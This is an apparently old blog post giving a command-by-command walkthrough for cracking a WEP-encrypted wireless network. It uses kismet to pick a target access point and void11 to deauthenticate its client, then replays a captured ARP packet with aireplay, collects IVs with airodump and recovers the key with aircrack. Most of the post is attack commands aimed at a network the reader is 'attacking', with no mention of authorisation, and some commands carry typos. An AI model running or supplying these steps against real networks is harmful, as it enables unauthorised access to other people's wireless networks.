This is a guide I wrote a couple years back as you can tell since secuirty auditor has been backtracks for over a year now. Most information holds true still.
Needed:
2 Prism 2/2.5/3 wireless cards
2 Computers running Security auditor
Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address
Lets begin
Computer 1
Start up kismet
Press s to sort the AP’s
Press Enter on the AP your attacking get the following info
-Channel
-SSID
-BSSID
Press x to exit
Press shift + c get the following information
-PC
Exit kismet
Open terminal and run the following commands
Switch-to-hostap
Cardctl eject
Cardctl insert
Iwconfig wlan0 channel #
Iwpriv wlan0 hostapd 1
Iwconfig wlan0 mode master
Void11_penetration –D –s PC –B AP wlan0
Computer 2
Open terminal and run the following commands
Switch-to-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Aireplay –I wlan0 –b AP –m 68 –n 68 –d ff:ff:ff:ff:ff:ff
You need a packet that looks like such
FromDS – 0
ToDS -1
BSSID – AP
SourceMAC – PC
Destination MAC – ff:ff:ff:ff:ff:ff
Click y to replay this ARP packet
Computer1
Since you got the above packet you can close void11
Open terminal and run
Switch-tp-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Airodump wlan0 cap1
Once you get 100,000 IV’s exit for 64bit keys 800,000 for 128bit keys
Open terminal
Cd /ramdisk (key length)
Aircrack –f 2 –m AP –n 64/128 –q 3 cap*.cap
In a while you should have you WEP key
No comments:
Post a Comment